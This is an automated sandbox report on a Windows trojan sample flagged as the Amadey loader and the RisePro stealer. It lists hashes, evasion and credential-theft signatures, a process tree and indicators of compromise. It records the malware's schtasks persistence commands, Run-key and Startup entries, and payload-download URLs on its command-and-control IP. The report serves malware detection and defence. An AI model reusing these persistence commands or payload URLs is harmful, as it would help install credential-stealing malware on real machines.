Windows Analysis Report
I2jCDr35mu.exe

Overview

General Information

Sample name: I2jCDr35mu.exe
renamed because original name is a hash value
Original sample name: 758c5213c3ffebe919633188f8c07747.exe
Analysis ID: 1396093
MD5: 758c5213c3ffebe919633188f8c07747
SHA1: fa534e53d645f69d1c950d8ff17e11e877ca970b
SHA256: b50becdb79b109e85caa4f588343fdd7e96152f4e23f40ad213a0336118bc87b
Tags: 32, exe, trojan
Infos:

Detection

Amadey, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadey's stealer DLL
Yara detected RisePro Stealer
Binary is likely a compiled AutoIt script file
Creates multiple autostart registry keys
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file overlay found
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • I2jCDr35mu.exe (PID: 6268 cmdline: C:\Users\user\Desktop\I2jCDr35mu.exe MD5: 758C5213C3FFEBE919633188F8C07747)
    • schtasks.exe (PID: 4176 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6084 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • KFLpYwMPXjapw3SVf9HA.exe (PID: 6596 cmdline: "C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe" MD5: CBE3CA8AEB654F541B59B3F97C0C9492)
      • chrome.exe (PID: 6204 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.youtube.com/ MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • chrome.exe (PID: 7536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2060,i,8917249356731724764,4060394153306559308,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 2748 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.linkedin.com/login MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • chrome.exe (PID: 7668 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1912 --field-trial-handle=1968,i,14158324147676388731,1062553766962202569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7208 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.facebook.com/video MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • chrome.exe (PID: 8264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1960,i,9119518786017765982,11408166405058387419,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 8292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://accounts.google.com/ MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • chrome.exe (PID: 8644 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1976,i,16814294900655359073,9593979145222890954,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • msedge.exe (PID: 8708 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com MD5: BF154738460E4AB1D388970E1AB13FAB)
        • msedge.exe (PID: 8776 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2160,i,16389860597425483203,2440417180069271130,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
      • msedge.exe (PID: 8804 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/video MD5: BF154738460E4AB1D388970E1AB13FAB)
        • msedge.exe (PID: 8616 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2044,i,14961278424366734041,2160420270144941880,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
      • msedge.exe (PID: 9036 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com MD5: BF154738460E4AB1D388970E1AB13FAB)
      • chrome.exe (PID: 2128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 9112 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 9528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • firefox.exe (PID: 9756 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 9904 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 9956 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • schtasks.exe (PID: 10268 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 10376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 10596 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 10612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • idPXKSo93Tb9SEEu9e8w.exe (PID: 10824 cmdline: "C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe" MD5: 2C4C8C25D448625A0184403CA56EDB2D)
  • MPGPH131.exe (PID: 1096 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 758C5213C3FFEBE919633188F8C07747)
  • MPGPH131.exe (PID: 5324 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 758C5213C3FFEBE919633188F8C07747)
  • RageMP131.exe (PID: 3632 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 758C5213C3FFEBE919633188F8C07747)
  • RageMP131.exe (PID: 7216 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 758C5213C3FFEBE919633188F8C07747)
  • msedge.exe (PID: 9412 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 10112 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2892 --field-trial-handle=2488,i,12328680280612180646,18333747278986842312,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • firefox.exe (PID: 9028 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 7068 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 10808 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2196 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2dec1c63-b17a-4876-842e-08a38d7ca489} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 15443b69710 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 11140 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3352 -childID 1 -isForBrowser -prefsHandle 3476 -prefMapHandle 3456 -prefsLen 21837 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {03d6e9a6-1e50-44a7-bf2d-b228302d3bed} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 154542c5bd0 tab MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 10428 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3612 -childID 2 -isForBrowser -prefsHandle 3648 -prefMapHandle 3644 -prefsLen 22027 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c15219fb-e510-488d-91c4-9069f57fa56f} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 1544ff41d90 tab MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 10360 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3648 -childID 3 -isForBrowser -prefsHandle 2584 -prefMapHandle 4128 -prefsLen 22068 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {25243739-fa95-4db8-bf39-e38de4f4d55a} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 154576c6a10 tab MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • firefox.exe (PID: 2716 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • firefox.exe (PID: 8076 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 5876 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • MSIUpdaterV131.exe (PID: 10880 cmdline: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe MD5: 2C4C8C25D448625A0184403CA56EDB2D)
  • MSIUpdaterV131.exe (PID: 11052 cmdline: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe MD5: 2C4C8C25D448625A0184403CA56EDB2D)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

No configs have been found

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\tYPDz_TYm0NTu0Y5ud8z_nO.zip | JoeSecurity_RiseProStealer | Yara detected RisePro Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\up45CFBz_Ai1CiBRyRFsyfp.zip | JoeSecurity_RiseProStealer | Yara detected RisePro Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\4enxhe06Yd_3ns7WRVTEXcO.zip | JoeSecurity_RiseProStealer | Yara detected RisePro Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000033.00000003.2673856805.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000030.00000003.2671707007.0000000005330000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000006.00000003.2506172514.0000000001446000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RiseProStealer | Yara detected RisePro Stealer | Joe Security |
00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000002F.00000003.2504348053.0000000004E70000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

Source | Rule | Description | Author | Strings
51.2.MSIUpdaterV131.exe.ef0000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
6.3.MPGPH131.exe.1461520.9.unpack | JoeSecurity_RiseProStealer | Yara detected RisePro Stealer | Joe Security |
47.2.idPXKSo93Tb9SEEu9e8w.exe.e80000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
48.2.MSIUpdaterV131.exe.ef0000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

                          System Summary

                          Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\I2jCDr35mu.exe, ProcessId: 6268, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131
                          Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: EventID: 11, Image: C:\Users\user\Desktop\I2jCDr35mu.exe, ProcessId: 6268, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk
                          No Snort rule has matched

                          AV Detection

                          Source: C:\Users\user\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exe, Avira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe, Avira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe, ReversingLabs: Detection: 39%
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe, ReversingLabs: Detection: 39%
                          Source: I2jCDr35mu.exe, ReversingLabs: Detection: 39%
                          Source: I2jCDr35mu.exe, Virustotal: Detection: 41%
                          Source: C:\Users\user\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exe, Joe Sandbox ML: detected
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe, Joe Sandbox ML: detected
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe, Joe Sandbox ML: detected
                          Source: I2jCDr35mu.exe, Joe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe, Code function: 0_2_0004FFC0 CryptUnprotectData,CryptUnprotectData,0_2_0004FFC0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe, Code function: 0_2_0004FEE0 CryptUnprotectData,CryptUnprotectData,0_2_0004FEE0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe, Code function: 6_2_00A0FFC0 CryptUnprotectData,CryptUnprotectData,6_2_00A0FFC0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe, Code function: 6_2_00A0FEE0 CryptUnprotectData,CryptUnprotectData,6_2_00A0FEE0
                          Source: I2jCDr35mu.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe, Code function: 0_2_0003C050 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,__Mtx_unlock,0_2_0003C050
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe, Code function: 0_2_0010B4E5 recv,FindFirstFileExW,0_2_0010B4E5
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe, Code function: 6_2_009FC050 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,__Mtx_unlock,6_2_009FC050
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe, Code function: 6_2_00ACB4E5 recv,FindFirstFileExW,6_2_00ACB4E5
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe, File opened: C:\Users\user\AppData
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe, File opened: C:\Users\user\AppData\Local
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe, File opened: C:\Users\user
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe, File opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe, File opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe, File opened: C:\Users\user\AppData\Local\Temp
                          Source: firefox.exe, Memory has grown: Private usage: 1MB later: 243MB
                          Source: Joe Sandbox View, IP Address: 13.107.6.158
                          Source: Joe Sandbox View, IP Address: 204.79.197.200
                          Source: Joe Sandbox View, IP Address: 13.107.246.40
                          Source: Joe Sandbox View, IP Address: 185.215.113.46
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe, Code function: 0_2_0004DBB0 recv,WSAStartup,closesocket,socket,connect,closesocket,0_2_0004DBB0
                          Source: firefox.exe, 00000024.00000003.2946754613.0000290E28A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/Z equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.2399452687.0000029036209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.facebook.com/video --attempting-deelevation equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001F.00000002.2388590768.00000159B5209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.youtube.com --attempting-deelevation equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000024.00000003.3058703225.000001545C2A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                          Source: MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/fu.exe
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/fu.exe)
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/fu.exe22
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/fu.exeagertaT
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exe
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exe0
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.00000000013FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exe1
                          Source: MPGPH131.exe, 00000007.00000002.3265617716.000000000641C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exe12
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exe2
                          Source: I2jCDr35mu.exe, 00000000.00000003.2630425787.0000000005D00000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3265617716.000000000641C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exe6
                          Source: I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exe93
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exeF
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exe_B
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exeb
                          Source: I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exeg
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.0000000001485000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.3266538532.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exeheidiMl1n683teX9h
                          Source: I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.0000000001485000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.3266538532.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exelF
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exenBuil
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exeo4H
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.0000000001485000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.3266538532.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exeppData
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exer
                          Source: MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exetch
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exex
                          Source: MPGPH131.exe, 00000007.00000002.3265617716.000000000641C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/niks.exe
                          Source: I2jCDr35mu.exe, 00000000.00000003.2601693895.0000000005CD5000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2630425787.0000000005D00000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/niks.exeF
                          Source: MPGPH131.exe, 00000007.00000002.3265617716.000000000641C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/niks.exeIw$
                          Source: MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/niks.exeJ
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/niks.exeMB
